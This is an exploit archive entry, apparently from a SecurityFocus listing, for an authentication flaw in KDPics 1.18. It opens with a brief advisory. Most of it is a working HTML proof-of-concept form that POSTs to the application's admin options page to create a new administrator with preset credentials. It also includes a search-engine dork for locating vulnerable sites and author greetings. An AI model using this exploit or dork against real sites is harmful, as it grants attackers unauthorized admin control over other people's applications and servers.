51 lines
1.7 KiB
HTML
Executable file
51 lines
1.7 KiB
HTML
Executable file
source: http://www.securityfocus.com/bid/38603/info
|
|
|
|
KDPics is prone to a vulnerability that lets an attacker add an administrative user because it fails to adequately secure access to administrative functionality.
|
|
|
|
This may allow the attacker to compromise the application and the computer; other attacks are also possible.
|
|
|
|
KDPics 1.18 is vulnerable; other versions may also be affected.
|
|
|
|
|
|
<html>
|
|
<title>G?n?r? par KDPics v1.18 Remote Add Admin</title>
|
|
|
|
<body link="#00FF00" text="#008000" bgcolor="#000000">
|
|
|
|
<form method="POST" action="http://www.example.com/kdpics/admin/index.php3?page=options&categorie=">
|
|
<input type="hidden" name="type" value="add">
|
|
<table border="1" cellpadding="4" style="border-collapse: collapse" width="100%" bordercolor="#808080">
|
|
<tr>
|
|
<td class="top">
|
|
<p align="center"><b>User & Pass :Snakespc</b></p>
|
|
<p align="center"><b><font face="Comic Sans MS">
|
|
<a href="http://www.example.com//index.php?act=idx" style="text-decoration: none">
|
|
<font color="#00FF00">[?]Founder:[ Snakespc Email:super_cristal@hotmail.com - Site:sec-war.com/cc> ]</p>
|
|
[?] Greetz to:[ sec-warTeaM, PrEdAtOr ,alnjm33 >>> All My Mamber >> sec-war.com/cc ]</p>[?] Dork:"G?n?r? par KDPics v1.18"</font></a></font></b></p>
|
|
<p align="center"><b>Username:</b></td>
|
|
</tr>
|
|
<tr>
|
|
<td height="1">
|
|
<p align="center"><input type="text" name="adminuser" size="30" value="Snakespc"></td>
|
|
</tr>
|
|
<tr>
|
|
<td class="top">
|
|
<p align="center"><b>Password:</b></td>
|
|
</tr>
|
|
<tr>
|
|
|
|
<td height="22">
|
|
<p align="center">
|
|
<input type="password" name="adminpass" size="30" value="Snakespc"></td>
|
|
</tr>
|
|
<tr>
|
|
<td align="right">
|
|
<p align="center">
|
|
<input type="submit" value="Add User >>" style="font-weight: 700"></td>
|
|
</tr>
|
|
</form>
|
|
</table>
|
|
</html>
|
|
|
|
|
|
|